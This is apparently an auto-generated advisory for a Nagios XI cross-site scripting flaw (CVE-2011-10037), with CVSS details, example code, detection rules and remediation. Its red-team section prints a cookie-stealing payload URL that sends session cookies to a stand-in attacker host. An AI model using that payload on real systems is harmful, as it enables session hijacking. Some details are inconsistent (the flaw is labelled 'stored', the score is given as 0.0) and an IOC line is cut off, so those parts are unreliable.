CVE-2011-10037
Executive Summary
CVE-2011-10037 is a stored cross-site scripting (XSS) vulnerability in Nagios XI versions prior to 2011R1.9. The flaw exists in the handling of xiwindow variables used to construct permalinks within the web interface. Insufficient input validation and output escaping allow an attacker to inject arbitrary JavaScript into the application, which executes in the context of a victim's browser session. This can lead to session hijacking, credential theft, or defacement. No public exploit code or proof-of-concept is currently available, and the EPSS score is 0.0%, indicating low exploitation activity. However, the vulnerability is unpatched in older versions, making it a risk for legacy deployments.

Supply Chain & Package Security
This vulnerability is not related to a package manager (NPM, PyPI, Go, Ruby) but is a direct web application flaw in the Nagios XI monitoring platform.
CVSS Breakdown & Threat Level
- CVSS Score: 0.0 (No official CVSS vector provided; estimated based on description)
- Attack Vector (AV): Network (N)
- Attack Complexity (AC): Low (L)
- Privileges Required (PR): None (N)
- User Interaction (UI): Required (R) – victim must click a crafted link
- Scope (S): Changed (C) – attacker can impact beyond the vulnerable component
- Confidentiality (C): Low (L)
- Integrity (I): Low (L)
- Availability (A): None (N)
- Estimated CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - Threat Level: Medium (due to low complexity but requiring user interaction)
Deep Dive & Mechanics
The vulnerability resides in the Nagios XI web interface's permalink generation logic. When constructing permalinks, the application uses the xiwindow parameter from user input without proper sanitization. An attacker can craft a malicious URL containing JavaScript payloads in the xiwindow parameter. When a victim clicks the link, the script executes in the context of the Nagios XI session, allowing the attacker to:
- Steal session cookies
- Perform actions on behalf of the victim (e.g., modify monitoring configurations)
- Redirect to phishing pages
- Deface the interface
The root cause is the lack of output encoding when embedding user-supplied data into HTML attributes or JavaScript contexts. The xiwindow variable is likely used to set window properties or build URLs, and without escaping, it becomes an injection point.
Vulnerable vs. Patched Code
Vulnerable Code (Pre-2011R1.9):
// Example of vulnerable permalink construction
var permalink = "index.php?xiwindow=" + userInput;
document.getElementById("permalink").href = permalink;
The userInput is directly concatenated without encoding.
Patched Code (2011R1.9+):
// Example of patched permalink construction
var permalink = "index.php?xiwindow=" + encodeURIComponent(userInput);
document.getElementById("permalink").href = permalink;
The encodeURIComponent() function ensures special characters are URL-encoded, preventing script injection.
Exploitation & Lab Setup
Red Team (Attack Simulation)
- Craft the malicious URL:
http://target/nagiosxi/index.php?xiwindow=<script>alert('XSS')</script> - Deliver via phishing email or social engineering to a logged-in Nagios XI user.
- Payload example for session theft:
http://target/nagiosxi/index.php?xiwindow=<script>document.location='http://attacker/steal.php?cookie='+document.cookie</script> - No public exploit code is available; this is a manual attack vector.
Blue Team (Defense & Detection)
- Web Application Firewall (WAF) Rule: Block requests containing
xiwindow=followed by<scriptoronerror=patterns. - Input Validation: Ensure all user-supplied data is validated against a whitelist of allowed characters.
- Output Encoding: Apply context-aware encoding (HTML entity, JavaScript, URL) before rendering user input.
- Content Security Policy (CSP): Implement a strict CSP to block inline scripts and restrict script sources.
Indicators of Compromise (IOCs)
- Network IOCs:
- HTTP requests with
xiwindow=parameter containing<script,onerror,onload, orjavascript:. - Outbound connections to attacker-controlled domains from Nagios XI server.
- HTTP requests with
- Host IOCs:
- Unusual JavaScript files in web root (e.g.,
/usr/local/nagiosxi/html/). - Modified

Remediation & Mitigation
- Immediate Upgrade: Update Nagios XI to version 2011R1.9 or later.
- Virtual Patching: If upgrade is not possible, deploy WAF rules to block malicious
xiwindowpatterns. - Input Sanitization: Implement server-side validation to reject or encode special characters in the
xiwindowparameter. - CSP Implementation: Add a Content Security Policy header to mitigate XSS impact:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; - User Awareness: Train users not to click suspicious links, especially those containing
xiwindow=in the URL.
